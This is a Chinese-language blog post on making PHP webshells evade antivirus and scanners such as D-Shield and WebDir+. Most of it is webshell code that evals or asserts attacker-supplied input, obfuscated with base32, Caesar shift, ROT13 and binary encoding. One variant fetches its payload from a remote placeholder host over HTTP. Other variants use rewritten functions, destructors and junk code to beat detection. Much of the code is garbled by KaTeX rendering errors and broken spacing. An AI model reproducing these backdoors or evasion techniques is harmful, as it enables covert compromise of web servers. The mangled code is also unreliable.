渗透测试-一些webshell免杀的技巧

炫彩@之星

已于 2024-04-14 16:54:28 修改

阅读量1.1k

点赞数

分类专栏：渗透测试文章标签：安全性测试 web安全安全

于 2022-12-16 11:20:10 首次发布

本文链接：https://blog.csdn.net/lza20001103/article/details/127907054

版权

渗透测试专栏收录该内容

93 篇文章 68 订阅

订阅专栏

一些webshell免杀的技巧

0x00：前言
0x01：自定义加密Bypass
- ascii码移位payload（凯撒加密）
- 二进制转化payload
0x02：通过http获得关键参数
0x03：重写函数Bypass
0x04：写在后面

0x00：前言

由于杀软的规则在不断更新所以很多之前的过杀软方法基本上都不行了而且随着php7逐渐扩张 assert马也将被淘汰所以本文将提出几种免杀思路效果很好而且不会被杀软的正则和沙盒规则约束。

0x01：自定义加密Bypass

部分杀软会直接将一些编码函数如Base64、编码后的关键字或组合函数加入了规则比如某dir+
在这里插入图片描述
比如这个都能被检测出是shell

所以为了防止这种的规则自定义加密显然是最优解

自定义加密可选性多了只要能把加密后的字符还原回去就行比如base32 base58 这类的base编码全家桶或者自定义ascii移位甚至是对称加密算法等都是可以绕过这类规则检测
base32编码payload
（https://github.com/pureqh/webshell）：

<?php

class KUYE{
public $DAXW = null;

  public $LRXV = null;
  function __construct(){
  $this->DAXW = 'mv3gc3bierpvat2tkrnxuzlsn5ossoy';
  $this->LRXV = @SYXJ($this->DAXW);
  @eval("/*GnSpe=u*/".$this->LRXV."/*GnSpe=u*/");
  }}

new KUYE();
function MNWK($QSFX){
$BASE32_ALPHABET = ‘abcdefghijklmnopqrstuvwxyz234567’;
$NLHB = ‘’;
$v = 0;
$v bi t s = 0; f or ($ i = 0, $j = s t r l e n ($ QSFX); $i < $j; $i++){
$v <<= 8;
$v + = or d ($ QSFX[$i]);
$v bi t s + = 8; w hi l e ($ vbits >= 5) {
$vbits -= 5;
$NLHB .= $BASE32_ALPHABET[$ v >> $vbits];
$v &= ((1 << $KaTeX parse error: Expected 'EOF', got '}' at position 13: vbits) - 1);}̲} if ($ vbits > 0){
$v <<= (5 - $vbits);
$NLHB .= $BASE32_ALPHABET[$ v];}
return $KaTeX parse error: Expected 'EOF', got '}' at position 6: NLHB;}̲ function SYXJ($ QSFX){
$NLHB = ‘’;
$v = 0;
$v bi t s = 0; f or ($ i = 0, $j = s t r l e n ($ QSFX); $i < $j; $i++){
$v <<= 5; i f ($ QSFX[$i] >= ‘a’ && $QSFX [$ i] <= ‘z’){
$v + = (or d ($ QSFX[ $KaTeX parse error: Expected 'EOF', got '}' at position 18: \dots) - 97); }̲ elseif ($ QSFX[$i] >= ‘2’ && $QSFX [$ i] <= ‘7’) {
$v += (24 + $QSFX [$ i]);
} else {
exit(1);
}
$v bi t s + = 5; w hi l e ($ vbits >= 8){
$vbits -= 8;
$N L H B . = c h r ($ v >> $vbits);
$v &= ((1 << $vbits) - 1);}}
return $NLHB;}
?>
在这里插入图片描述

ascii码移位payload（凯撒加密）

<?php

class FKPC{
function __construct(){
$this->TQYV = “bs^i%!\MLPQXwbolZ&8”;
$t hi s - > W Z D M = @ HH G J ($ this->TQYV);
@eval(“/#jkskjwjqo/”. $KaTeX parse error: Expected 'EOF', got '#' at position 17: \dotshis->WZDM."/*sj#̲ahajsj*/"); \dots$ UyGv) {
$svfe = [];
$mxAS = ‘’;
$f = $U y G v; f or ($ i=0; $i < s t r l e n ($ f);$i++)
{
$s v f e [] = c h r ((or d ($ f[$i])+3));
}
$m x A S = im pl o d e ($ svfe);
return $mxAS ;
}
?>
在这里插入图片描述
居然没过webdir+

那如何解决呢我们后面再说当然应付D盾还是绰绰有余了
在这里插入图片描述
Rot13加密payload

<?php

class KUYE{
public $DAXW = null;
public $LRXV = null;
function __construct(){
$t hi s - > D A X W =^{'} r in y ($ _CBFG[mreb]);';
$this->LRXV = @str_rot13($ this->DAXW);
@eval(“/GnSpe=u/”.$this->LRXV.“/GnSpe=u/”);
}}
new KUYE();

二进制转化payload

<?php

class KUYE{
public $DAXW = null;
public $LRXV = null;
function __construct(){
$this->DAXW = ‘1100101 1110110 1100001 1101100 101000 100100 1011111 1010000 1001111 1010011 1010100 1011011 1111010 1100101 1110010 1101111 1011101 101001 111011’;
$t hi s - > L RX V = @ B in T o St r ($ this->DAXW);
@eval(“/GnSpe=u/”. $KaTeX parse error: Expected 'EOF', got '}' at position 36: \dotsu*/"); }̲} new KUYE(); f\dots$ str){
$arr = explode(’ ', $s t r); f ore a c h ($ arr as &$v){
$v = pack("H".strlen(base_convert($ v, 2, 16)), base_convert($v, 2, 16));
}

return join('', $arr);

}
?>
在这里插入图片描述

这里就不列举了只要方法正确绕过杀软是很简单的

0x02：通过http获得关键参数

上面那个凯撒密码不是被webdir+杀了吗我们在这里将他绕过

众所周知凯撒密码需要设置往前或往后移几位ascii 这个参数可以设置为解密方法的输入参数经过测试此参数在源码中会被沙盒跑出了因此不能过百度杀毒，那么我不写本地不就行了我直接起一个http服务访问文本获得参数值。

<?php

class FKPC{
function __construct(){
$url = “http://xxxxx:8080/1.txt”;
$f p = f o p e n ($ url, ‘r’);
stream_get_meta_data( $f p); w hi l e (! f eo f ($ fp)) {
$b o d y . = f g e t s ($ fp, 1024);
}
$this->x = $body;
$this->TQYV = “bs^i%!\MLPQXwbolZ&8”;
$t hi s - > W Z D M = @ HH G J ($ this->TQYV, $KaTeX parse error: Expected 'EOF', got '#' at position 28: \dots @eval("/*#̲jkskjwjqo*/".$ this->WZDM.“/sj#ahajsj/”);
}}
new FKPC();

function HHGJ( $U y G v,$ x) {
$svfe = [];
$mxAS = ‘’;
$f = $U y G v; f or ($ i=0; $i < s t r l e n ($ f);$i++)
{
$s v f e [] = c h r ((or d ($ f[ $i]) +$ x));
}
$m x A S = im pl o d e ($ svfe);
return $mxAS ;
}
?> 在这里插入图片描述
当然肯定能用
但是这转了一圈简直不低碳啊我不能直接http获取payload吗 …

简化代码：

<?php

class KUYE{
public $a = ‘yshasaui’;
public $b = ‘’;
function __construct(){
$url = “http://xxx/1.txt”;
$f p = f o p e n ($ url, ‘r’);
stream_get_meta_data( $f p); w hi l e (! f eo f ($ fp)) {
$b o d y . = f g e t s ($ fp, 1024);
}
$this->b = $b o d y; @ e v a l ("/ * G n Sp e = 121 u * /".$ this->b.“/Gn212Spe=u/”);
}}
new KUYE();
?> 在这里插入图片描述

0x03：重写函数Bypass

众所周知正则类杀软最喜欢直接把危险函数加入规则那么它杀的是函数名还是逻辑呢？

试一试就知道了

我们的样本如下：

<?php $a = substr("assertxx",0,6); $a($_POST['x']); ?>

这是个使用substr函数切割关键字的小马

直接扔到webdir+杀在这里插入图片描述
毫无疑问的被杀了

那么我们重写substr函数

function mysubstr($string, $start = 0, $length = null) {
$result = ‘’;
$s t r L e n g t h = s t r l e n ($ string);
if ($length === null) {
$length = $strLength;
}
$length = (int) $length;
$start = $s t a r t < 0 ? ($ strLength + $s t a r t) : ($ start);
$end = $l e n g t h < 0 ? ($ strLength + $length) : $start + $l e n g t h; i f ($ start > $s t r L e n g t h ∣∣ ($ end - $start) === 0) {
return $result;
}
for (; $start < $end; $start ++) {
$result .= $s t r in g [$ start];
}
return $result;
}

然后把函数替换

<?php

$b = ‘assert(xyz@’;
$c = m ys u b s t r ($ b,0,6);
$c ($ _POST[‘zero’]);
function mysubstr($string, $start = 0, $length = null) {
$result = ‘’;
$s t r L e n g t h = s t r l e n ($ string);
if ($length === null) {
$length = $strLength;
}
$length = (int) $length;
$start = $s t a r t < 0 ? ($ strLength + $s t a r t) : ($ start);
$end = $l e n g t h < 0 ? ($ strLength + $length) : $start + $l e n g t h; i f ($ start > $s t r L e n g t h ∣∣ ($ end - $start) === 0) {
return $result;
}
for (; $start < $end; $start ++) {
$result .= $s t r in g [$ start];
}
return $result;
}
?>

再拿去杀在这里插入图片描述
结论很清楚了

再来D盾杀一下在这里插入图片描述
不错报2级了这就是沙盒型查杀和正则类查杀的明显区别怎么过呢用构造方法即可

<?php

class pure
{
public $a = ‘’;
function __destruct(){

assert("$this->a");

}
}
$b = new pure;
$b->a = $_POST['zero']; function mysubstr($ string, $start = 0, $length = null) {
$result = ‘’;
$s t r L e n g t h = s t r l e n ($ string);
if ($length === null) {
$length = $strLength;
}
$length = (int) $length;
$start = $s t a r t < 0 ? ($ strLength + $s t a r t) : ($ start);
$end = $l e n g t h < 0 ? ($ strLength + $length) : $start + $l e n g t h; i f ($ start > $s t r L e n g t h ∣∣ ($ end - $start) === 0) {
return $result;
}
for (; $start < $end; $start ++) {
$result .= $s t r in g [$ start];
}
return $result;
}
?> 在这里插入图片描述
看到这里大家可能也很奇怪这里都没用到mysubstr函数放上去不是多此一举吗

不好意思恰恰不是我们可以去掉这个函数用D盾杀一下

<?php

class pure
{
public $a = ‘’;
function __destruct(){

assert("$this->a");

}
}
$b = new pure;
$b->a = $_POST[‘zero’];
?> 在这里插入图片描述
怎么样是不是很有趣

这里放这堆代码并不是为了真的用它而是为了过D盾的特征查杀所以放什么函数是无所谓的。

比如这样：

<?php

class pure
{
public $a = ‘’;
function __destruct(){

assert("$this->a");

}
}
$b = new pure;
$b->a = $_POST['zero']; function mysubstr($ a,$b) {
echo “?sasasjajksjka”;
echo “?sasasjajksjka”;
echo “?sasasjajksjka”;
echo “?sasasjajksjka”;
echo “?sasasjajksjka”;
echo “?sasasjajksjka”;
echo “?sasasjajksjka”;
echo “?sasasjajksjka”;
}
?> 在这里插入图片描述